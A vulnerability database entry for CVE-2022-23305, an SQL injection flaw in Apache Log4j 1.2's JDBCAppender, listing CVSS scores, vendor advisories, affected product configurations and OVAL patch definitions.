Vulnerability Name:

CVE-2022-23305 (CCN-217461)

Assigned:2022-01-18
Published:2022-01-18
Updated:2023-02-24
Summary:By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
CVSS v3 Severity:9.8 Critical (CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
9.4 Critical (Temporal CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C)
Exploitability Metrics:Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope:Scope (S): Unchanged
Impact Metrics:Confidentiality (C): High
Integrity (I): High
Availibility (A): High
6.5 Medium (CCN CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
6.2 Medium (CCN Temporal CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:H/RL:O/RC:C)
Exploitability Metrics:Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope:Scope (S): Unchanged
Impact Metrics:Confidentiality (C): Low
Integrity (I): Low
Availibility (A): None
8.8 High (REDHAT CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
8.4 High (REDHAT Temporal CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C)
Exploitability Metrics:Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): None
Scope:Scope (S): Unchanged
Impact Metrics:Confidentiality (C): High
Integrity (I): High
Availibility (A): High
CVSS v2 Severity:6.8 Medium (CVSS v2 Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P)
Exploitability Metrics:Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (Au): None
Impact Metrics:Confidentiality (C): Partial
Integrity (I): Partial
Availibility (A): Partial
6.4 Medium (CCN CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N)
Exploitability Metrics:Access Vector (AV): Network
Access Complexity (AC): Low
Athentication (Au): None
Impact Metrics:Confidentiality (C): Partial
Integrity (I): Partial
Availibility (A): None
Vulnerability Type:CWE-89
Vulnerability Consequences:Data Manipulation
References:Source: MITRE
Type: CNA
CVE-2022-23305

Source: security@apache.org
Type: Mailing List, Third Party Advisory
security@apache.org

Source: XF
Type: UNKNOWN
apache-cve202223305-sql-injection(217461)

Source: security@apache.org
Type: Issue Tracking, Mailing List, Vendor Advisory
security@apache.org

Source: CCN
Type: Apache Web site
Apache log4j 1.2

Source: security@apache.org
Type: Vendor Advisory
security@apache.org

Source: CCN
Type: oss-sec Mailing List, Tue, 18 Jan 2022 14:42:35 +0000
CVE-2022-23305: SQL injection in JDBC Appender in Apache Log4j V1

Source: security@apache.org
Type: Third Party Advisory
security@apache.org

Source: CCN
Type: IBM Security Bulletin 6550822 (Db2 Web Query for i)
Due to use of Apache Log4j, IBM Db2 Web Query for i is vulnerable to arbitrary code execution (CVE-2021-4104, CVE-2022-23302, and CVE-2022-23307) and SQL injection (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6551856 (Netezza Analytics for NPS)
Log4j vulnerabilities affect IBM Netezza Analytics for NPS

Source: CCN
Type: IBM Security Bulletin 6553876 (App Connect for Healthcare)
IBM App Connect for Healthcare is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6554466 (Netezza Analytics)
Log4j vulnerabilities affect IBM Netezza Analytics

Source: CCN
Type: IBM Security Bulletin 6557200 (Sterling Connect:Direct Web Services)
IBM Sterling Connect:Direct Web Services is vulnerable to SQL injection due to Apache Log4j (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6557248 (WebSphere Application Server)
IBM WebSphere Application Server and IBM WebSphere Application Server Liberty are vulnerable to arbitrary code execution and SQL injection due to Apache Log4j. (CVE-2022-23302, CVE-2022-23307, CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6563857 (Tivoli Netcool/OMNIbus)
Due to use of Apache Log4j, IBM Netcool/OMNIbus Probe DSL Factory Framework is vulnerable to arbitrary code execution (CVE-2022-23302, CVE-2022-23307) and SQL injection (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6565005 (Cloud Pak for Data System)
Vulnerability in Apache Log4j affects IBM Cloud Pak for Data System 1.0

Source: CCN
Type: IBM Security Bulletin 6565383 (Cloudera Enterprise Data Hub)
Cloudera Data Platform Private Cloud Base with IBM products have log messages vulnerable to arbitrary code execution, denial of service, remote code execution, and SQL injection due to Apache Log4j vulnerabilities

Source: CCN
Type: IBM Security Bulletin 6568539 (UrbanCode Deploy)
IBM Urbancode Deploy impacted by Apache Log4j SQL Injection vulnerability. (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6568675 (Spectrum Discover)
IBM Spectrum Discover is vulnerable to Docker CLI (CVE-2021-41092) and Apache Log4j (CVE-2021-4104, CVE-2022-23302, CVE-2022-23305, CVE-2022-23307) weaknesses

Source: CCN
Type: IBM Security Bulletin 6568731 (App Connect Enterprise)
IBM App Connect Enterprise & IBM Integration Bus are vulnerable to arbitrary code execution due to Apache Log4j (CVE-2022-23307, CVE-2022-23302) and SQL injection due to Apache Log4j (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6569143 (Tivoli Netcool/Impact)
IBM Tivoli Netcool Impact is affected by an Apache Log4j vulnerability (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6569997 (Sterling Order Management)
Apache Log4j vulnerability

Source: CCN
Type: IBM Security Bulletin 6584095 (Curam SPM)
Curam Social Program Management is vulnerable to arbitrary code execution and SQL injection issues due to Apache Log4j (CVE-2022-23302, CVE-2022-23305, CVE-2022-23307)

Source: CCN
Type: IBM Security Bulletin 6585004 (CCA for MTM 4767 for Linux x64)
Crypto Hardware Initialization and Maintenance is vulnerable to arbitrary code execution due to Apache Log4j (CVE 2021-4104, CVE 2022-23302, CVE 2022-23305, CVE 2022-23307)

Source: CCN
Type: IBM Security Bulletin 6590835 (Cloud Pak System)
Multiple vulnerabilities in Apache Log4j affect IBM Cloud Pak System

Source: CCN
Type: IBM Security Bulletin 6591309 (Cognos Controller)
IBM Cognos Controller is affected but not vulnerable to arbitrary code execution and SQL injection due to Apache Log4j v1 vulnerabilities (CVE-2022-23305, CVE-2022-23302, CVE-2021-4104)

Source: CCN
Type: IBM Security Bulletin 6591351 (Telco Network Cloud Manager)
IBM Telco Network Cloud Manager - Performance is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832,CVE-2022-23302 and CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6600099 (OpenPages with Watson)
IBM OpenPages with Watson has addressed Apache Log4j vulnerability (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6606301 (Cloud Pak for Multicloud Management)
IBM Cloud Pak for Multicloud Management Monitoring is potentially vulnerable to execution of arbitrary code due to its use of Apache Log4j (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6606605 (Log Analysis)
Multiple vulnerabilities in log4j-1.2.16.jar used by IBM Operations Analytics - Log Analysis

Source: CCN
Type: IBM Security Bulletin 6610084 (Data Risk Manager)
IBM Data Risk Manager is affected by multiple vulnerabilities including remote code execution in Apache Log4j 1.x

Source: CCN
Type: IBM Security Bulletin 6829357 (InfoSphere Information Server)
IBM InfoSphere Information Server may be affected by vulnerabilities in Apache log4j 1.x version

Source: CCN
Type: IBM Security Bulletin 6830971 (Sterling Order Management)
IBM Sterling Order Management migration strategy to Apache Log4j vulnerability (see CVEs below)

Source: CCN
Type: IBM Security Bulletin 6840121 (Operations Analytics Predictive Insights)
IBM Operations Analytics Predictive Insights impacted by Apache Log4j vulnerabilities (CVE-2022-23305)

Source: CCN
Type: IBM Security Bulletin 6848225 (Netcool Operations Insight)
Netcool Operations Insight v1.6.7 contains fixes for multiple security vulnerabilities.

Source: CCN
Type: IBM Security Bulletin 6848507 (Integrated Analytics System)
Vulnerability in Log4j affects IBM Integrated Analytics System [CVE-2022-23305]

Source: CCN
Type: Oracle CPUApr2022
Oracle Critical Patch Update Advisory - April 2022

Source: security@apache.org
Type: Patch, Third Party Advisory
security@apache.org

Source: CCN
Type: Oracle CPUJul2022
Oracle Critical Patch Update Advisory - July 2022

Source: security@apache.org
Type: Patch, Third Party Advisory
security@apache.org

Vulnerable Configuration:Configuration RedHat 1:
  • cpe:/a:redhat:enterprise_linux:8:*:*:*:*:*:*:*
    • Configuration RedHat 2:
  • cpe:/a:redhat:enterprise_linux:8::appstream:*:*:*:*:*
    • Configuration RedHat 3:
  • cpe:/o:redhat:enterprise_linux:7:*:*:*:*:*:*:*
    • Configuration RedHat 4:
  • cpe:/o:redhat:enterprise_linux:7::client:*:*:*:*:*
    • Configuration RedHat 5:
  • cpe:/o:redhat:enterprise_linux:7::computenode:*:*:*:*:*
    • Configuration RedHat 6:
  • cpe:/o:redhat:enterprise_linux:7::server:*:*:*:*:*
    • Configuration RedHat 7:
  • cpe:/o:redhat:enterprise_linux:7::workstation:*:*:*:*:*
    • Configuration RedHat 8:
  • cpe:/o:redhat:rhel_els:6:*:*:*:*:*:*:*

    • Configuration CCN 1:
  • cpe:/a:apache:log4j:1.2:-:*:*:*:*:*:*
  • AND
  • cpe:/a:ibm:websphere_application_server:7.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:websphere_application_server:8.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:websphere_application_server:8.5:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:tivoli_netcool/impact:7.1.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:tivoli_netcool/omnibus:8.1.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:websphere_application_server:9.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:operations_analytics_predictive_insights:1.3.3:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:operations_analytics_predictive_insights:1.3.5:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:operations_analytics_predictive_insights:1.3.6:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:business_intelligence:12.2.1.3.0::~~enterprise~~~:*:*:*:*:*
  • OR cpe:/a:ibm:infosphere_information_server:11.7:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*
  • OR cpe:/a:oracle:business_intelligence:12.2.1.4.0::~~enterprise~~~:*:*:*:*:*
  • OR cpe:/a:ibm:app_connect:11.0.0.0:*:*:*:enterprise:*:*:*
  • OR cpe:/a:ibm:cognos_controller:10.4.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cognos_controller:10.4.1:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:urbancode_deploy:6.2.7:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:urbancode_deploy:7.0.3:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.0.1:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:websphere_application_server:17.0.0.3:*:*:*:liberty:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.1.1:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:urbancode_deploy:7.0.5:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.2.0:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cognos_controller:10.4.2:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.3.1:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.3.2:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:cloud_pak_system:2.3.3.3:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:integration_bus:10.0.0.6:*:*:*:*:*:*:*
  • OR cpe:/a:ibm:websphere_application_server:21.0.0.12:*:*:*:liberty:*:*:*
  • OR cpe:/a:ibm:sterling_order_management:10:*:*:*:*:*:*:*

    • * Denotes that component is vulnerable
    Oval Definitions
    Definition IDClassTitleLast Modified
    oval:org.opensuse.security:def:8038
    P
    		log4j12-javadoc-1.2.17-4.9.1 on GA media (Moderate)
    2023-06-20
    oval:org.opensuse.security:def:7714
    P
    		log4j12-1.2.17-4.9.1 on GA media (Moderate)
    2023-06-12
    oval:org.opensuse.security:def:3121
    P
    		krb5-appl-clients-1.0.3-1.2 on GA media (Moderate)
    2022-06-28
    oval:org.opensuse.security:def:3407
    P
    		xorg-x11-libs-7.6-45.14 on GA media (Moderate)
    2022-06-28
    oval:org.opensuse.security:def:94751
    P
    		log4j12-1.2.17-4.9.1 on GA media (Moderate)
    2022-06-22
    oval:org.opensuse.security:def:95037
    P
    		log4j12-javadoc-1.2.17-4.9.1 on GA media (Moderate)
    2022-06-22
    oval:com.redhat.rhsa:def:20220442
    P
    		RHSA-2022:0442: log4j security update (Important)
    2022-02-07
    oval:org.opensuse.security:def:119100
    P
    		Security update for log4j12 (Important)
    2022-01-28
    oval:org.opensuse.security:def:94457
    P
    		 (Important)
    2022-01-28
    oval:org.opensuse.security:def:922
    P
    		Security update for log4j12 (Important)
    2022-01-28
    oval:org.opensuse.security:def:93822
    P
    		 (Important)
    2022-01-28
    oval:org.opensuse.security:def:100743
    P
    		 (Important)
    2022-01-28
    oval:org.opensuse.security:def:119240
    P
    		Security update for log4j12 (Important)
    2022-01-28
    oval:org.opensuse.security:def:1184
    P
    		Security update for log4j12 (Important)
    2022-01-28
    oval:org.opensuse.security:def:118745
    P
    		Security update for log4j12 (Important)
    2022-01-28
    oval:org.opensuse.security:def:94036
    P
    		 (Important)
    2022-01-28
    oval:org.opensuse.security:def:101614
    P
    		Security update for log4j12 (Important)
    2022-01-28
    oval:org.opensuse.security:def:119430
    P
    		Security update for log4j12 (Important)
    2022-01-28
    oval:org.opensuse.security:def:100071
    P
    		 (Important)
    2022-01-28
    oval:org.opensuse.security:def:118935
    P
    		Security update for log4j12 (Important)
    2022-01-28
    oval:org.opensuse.security:def:94248
    P
    		 (Important)
    2022-01-28
    oval:org.opensuse.security:def:101845
    P
    		Security update for log4j12 (Important)
    2022-01-28
    oval:org.opensuse.security:def:119615
    P
    		Security update for log4j12 (Important)
    2022-01-28
    oval:org.opensuse.security:def:100409
    P
    		 (Important)
    2022-01-28
    oval:org.opensuse.security:def:125736
    P
    		Security update for log4j (Important)
    2022-01-27
    oval:org.opensuse.security:def:6076
    P
    		Security update for log4j (Important)
    2022-01-27
    oval:org.opensuse.security:def:126902
    P
    		Security update for log4j (Important)
    2022-01-27
    oval:org.opensuse.security:def:127299
    P
    		Security update for log4j (Important)
    2022-01-27
    oval:org.opensuse.security:def:5278
    P
    		Security update for log4j (Important)
    2022-01-27
    oval:com.redhat.rhsa:def:20220290
    P
    		RHSA-2022:0290: parfait:0.5 security update (Important)
    2022-01-26
    BACK
    apache log4j 1.2 -
    ibm websphere application server 7.0
    ibm websphere application server 8.0
    ibm websphere application server 8.5
    ibm tivoli netcool/impact 7.1.0
    ibm tivoli netcool/omnibus 8.1.0
    ibm websphere application server 9.0
    ibm operations analytics predictive insights 1.3.3
    ibm operations analytics predictive insights 1.3.5
    ibm operations analytics predictive insights 1.3.6
    oracle weblogic server 12.2.1.3.0
    oracle identity manager 12.2.1.3.0
    oracle business intelligence 12.2.1.3.0
    ibm infosphere information server 11.7
    oracle business process management suite 12.2.1.3.0
    oracle jdeveloper 12.2.1.3.0
    oracle business intelligence 12.2.1.4.0
    ibm app connect 11.0.0.0
    ibm cognos controller 10.4.0
    ibm cognos controller 10.4.1
    ibm urbancode deploy 6.2.7
    ibm urbancode deploy 7.0.3
    ibm cloud pak system 2.3
    ibm cloud pak system 2.3.0.1
    ibm websphere application server 17.0.0.3
    ibm cloud pak system 2.3.1.1
    ibm urbancode deploy 7.0.5
    ibm cloud pak system 2.3.2.0
    ibm cognos controller 10.4.2
    ibm cloud pak system 2.3.3.1
    ibm cloud pak system 2.3.3.2
    ibm cloud pak system 2.3.3.3
    ibm integration bus 10.0.0.6
    ibm websphere application server 21.0.0.12
    ibm sterling order management 10